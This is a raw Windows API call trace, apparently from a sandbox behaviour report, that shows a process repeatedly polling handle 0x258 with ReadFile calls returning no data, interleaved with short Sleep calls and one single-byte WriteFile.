	[0252.377] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.377] GetLastError () returned 0x218
	[0252.378] Sleep (dwMilliseconds=0xa) 
	[0252.394] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.394] GetLastError () returned 0x218
	[0252.394] Sleep (dwMilliseconds=0xa) 
	[0252.409] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.409] GetLastError () returned 0x218
	[0252.409] Sleep (dwMilliseconds=0xa) 
	[0252.455] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.455] GetLastError () returned 0x218
	[0252.456] Sleep (dwMilliseconds=0xa) 
	[0252.503] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.503] GetLastError () returned 0x218
	[0252.503] Sleep (dwMilliseconds=0xa) 
	[0252.549] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.549] GetLastError () returned 0x218
	[0252.549] Sleep (dwMilliseconds=0xa) 
	[0252.562] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.562] GetLastError () returned 0x218
	[0252.562] Sleep (dwMilliseconds=0xa) 
	[0252.565] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.565] GetLastError () returned 0x218
	[0252.565] Sleep (dwMilliseconds=0xa) 
	[0252.580] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.580] GetLastError () returned 0x218
	[0252.580] Sleep (dwMilliseconds=0xa) 
	[0252.597] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.597] GetLastError () returned 0x218
	[0252.597] Sleep (dwMilliseconds=0xa) 
	[0252.645] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.645] GetLastError () returned 0x218
	[0252.645] Sleep (dwMilliseconds=0xa) 
	[0252.689] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.689] GetLastError () returned 0x218
	[0252.690] Sleep (dwMilliseconds=0xa) 
	[0252.736] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.736] GetLastError () returned 0x218
	[0252.736] Sleep (dwMilliseconds=0xa) 
	[0252.780] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.780] GetLastError () returned 0x218
	[0252.780] Sleep (dwMilliseconds=0xa) 
	[0252.796] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.796] GetLastError () returned 0x218
	[0252.796] Sleep (dwMilliseconds=0xa) 
	[0252.799] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.799] GetLastError () returned 0x218
	[0252.799] Sleep (dwMilliseconds=0xa) 
	[0252.814] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.814] GetLastError () returned 0x218
	[0252.814] Sleep (dwMilliseconds=0xa) 
	[0252.830] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.830] GetLastError () returned 0x218
	[0252.830] Sleep (dwMilliseconds=0xa) 
	[0252.848] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.848] GetLastError () returned 0x218
	[0252.849] Sleep (dwMilliseconds=0xa) 
	[0252.861] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.861] GetLastError () returned 0x218
	[0252.861] Sleep (dwMilliseconds=0xa) 
	[0252.877] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.877] GetLastError () returned 0x218
	[0252.877] Sleep (dwMilliseconds=0xa) 
	[0252.892] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.893] GetLastError () returned 0x218
	[0252.893] Sleep (dwMilliseconds=0xa) 
	[0252.932] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.932] GetLastError () returned 0x218
	[0252.932] Sleep (dwMilliseconds=0xa) 
	[0252.970] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0252.970] GetLastError () returned 0x218
	[0252.970] Sleep (dwMilliseconds=0xa) 
	[0253.017] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0253.017] GetLastError () returned 0x218
	[0253.017] Sleep (dwMilliseconds=0xa) 
	[0253.044] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0253.044] GetLastError () returned 0x218
	[0253.044] Sleep (dwMilliseconds=0xa) 
	[0253.048] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0253.048] GetLastError () returned 0x218
	[0253.048] Sleep (dwMilliseconds=0xa) 
	[0253.065] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0253.065] GetLastError () returned 0x218
	[0253.065] Sleep (dwMilliseconds=0xa) 
	[0253.110] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0253.111] GetLastError () returned 0x218
	[0253.111] Sleep (dwMilliseconds=0x3e8) 
	[0254.156] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0254.156] Sleep (dwMilliseconds=0xa) 
	[0254.203] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.203] GetLastError () returned 0x218
	[0254.203] Sleep (dwMilliseconds=0xa) 
	[0254.218] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.218] GetLastError () returned 0x218
	[0254.218] Sleep (dwMilliseconds=0xa) 
	[0254.234] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.234] GetLastError () returned 0x218
	[0254.234] Sleep (dwMilliseconds=0xa) 
	[0254.249] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.249] GetLastError () returned 0x218
	[0254.249] Sleep (dwMilliseconds=0xa) 
	[0254.265] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.265] GetLastError () returned 0x218
	[0254.265] Sleep (dwMilliseconds=0xa) 
	[0254.282] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.282] GetLastError () returned 0x218
	[0254.283] Sleep (dwMilliseconds=0xa) 
	[0254.296] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.296] GetLastError () returned 0x218
	[0254.296] Sleep (dwMilliseconds=0xa) 
	[0254.374] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.374] GetLastError () returned 0x218
	[0254.374] Sleep (dwMilliseconds=0xa) 
	[0254.421] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.421] GetLastError () returned 0x218
	[0254.421] Sleep (dwMilliseconds=0xa) 
	[0254.463] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.463] GetLastError () returned 0x218
	[0254.463] Sleep (dwMilliseconds=0xa) 
	[0254.476] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.476] GetLastError () returned 0x218
	[0254.476] Sleep (dwMilliseconds=0xa) 
	[0254.483] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.483] GetLastError () returned 0x218
	[0254.483] Sleep (dwMilliseconds=0xa) 
	[0254.499] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.499] GetLastError () returned 0x218
	[0254.499] Sleep (dwMilliseconds=0xa) 
	[0254.515] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.515] GetLastError () returned 0x218
	[0254.515] Sleep (dwMilliseconds=0xa) 
	[0254.531] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.531] GetLastError () returned 0x218
	[0254.531] Sleep (dwMilliseconds=0xa) 
	[0254.546] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.546] GetLastError () returned 0x218
	[0254.546] Sleep (dwMilliseconds=0xa) 
	[0254.562] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.562] GetLastError () returned 0x218
	[0254.562] Sleep (dwMilliseconds=0xa) 
	[0254.624] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.624] GetLastError () returned 0x218
	[0254.624] Sleep (dwMilliseconds=0xa) 
	[0254.670] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.671] GetLastError () returned 0x218
	[0254.671] Sleep (dwMilliseconds=0xa) 
	[0254.766] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.766] GetLastError () returned 0x218
	[0254.767] Sleep (dwMilliseconds=0xa) 
	[0254.835] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.835] GetLastError () returned 0x218
	[0254.835] Sleep (dwMilliseconds=0xa) 
	[0254.842] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.842] GetLastError () returned 0x218
	[0254.842] Sleep (dwMilliseconds=0xa) 
	[0254.858] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.858] GetLastError () returned 0x218
	[0254.858] Sleep (dwMilliseconds=0xa) 
	[0254.873] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.873] GetLastError () returned 0x218
	[0254.874] Sleep (dwMilliseconds=0xa) 
	[0254.967] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0254.967] GetLastError () returned 0x218
	[0254.967] Sleep (dwMilliseconds=0xa) 
	[0255.014] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.014] GetLastError () returned 0x218
	[0255.014] Sleep (dwMilliseconds=0xa) 
	[0255.060] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.060] GetLastError () returned 0x218
	[0255.061] Sleep (dwMilliseconds=0xa) 
	[0255.076] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.076] GetLastError () returned 0x218
	[0255.076] Sleep (dwMilliseconds=0xa) 
	[0255.092] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.092] GetLastError () returned 0x218
	[0255.092] Sleep (dwMilliseconds=0xa) 
	[0255.108] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.108] GetLastError () returned 0x218
	[0255.109] Sleep (dwMilliseconds=0xa) 
	[0255.123] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.123] GetLastError () returned 0x218
	[0255.123] Sleep (dwMilliseconds=0xa) 
	[0255.139] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.139] GetLastError () returned 0x218
	[0255.139] Sleep (dwMilliseconds=0xa) 
	[0255.155] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.155] GetLastError () returned 0x218
	[0255.155] Sleep (dwMilliseconds=0xa) 
	[0255.217] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.217] GetLastError () returned 0x218
	[0255.217] Sleep (dwMilliseconds=0xa) 
	[0255.263] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.263] GetLastError () returned 0x218
	[0255.263] Sleep (dwMilliseconds=0xa) 
	[0255.310] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.310] GetLastError () returned 0x218
	[0255.310] Sleep (dwMilliseconds=0xa) 
	[0255.338] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.338] GetLastError () returned 0x218
	[0255.338] Sleep (dwMilliseconds=0xa) 
	[0255.342] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.342] GetLastError () returned 0x218
	[0255.342] Sleep (dwMilliseconds=0xa) 
	[0255.357] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.357] GetLastError () returned 0x218
	[0255.357] Sleep (dwMilliseconds=0xa) 
	[0255.373] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.373] GetLastError () returned 0x218
	[0255.373] Sleep (dwMilliseconds=0xa) 
	[0255.389] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.389] GetLastError () returned 0x218
	[0255.389] Sleep (dwMilliseconds=0xa) 
	[0255.404] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.404] GetLastError () returned 0x218
	[0255.404] Sleep (dwMilliseconds=0xa) 
	[0255.453] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.453] GetLastError () returned 0x218
	[0255.453] Sleep (dwMilliseconds=0xa) 
	[0255.497] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.498] GetLastError () returned 0x218
	[0255.498] Sleep (dwMilliseconds=0xa) 
	[0255.544] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.544] GetLastError () returned 0x218
	[0255.544] Sleep (dwMilliseconds=0xa) 
	[0255.564] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0255.564] GetLastError () returned 0x218
	[0255.564] Sleep (dwMilliseconds=0xa) 
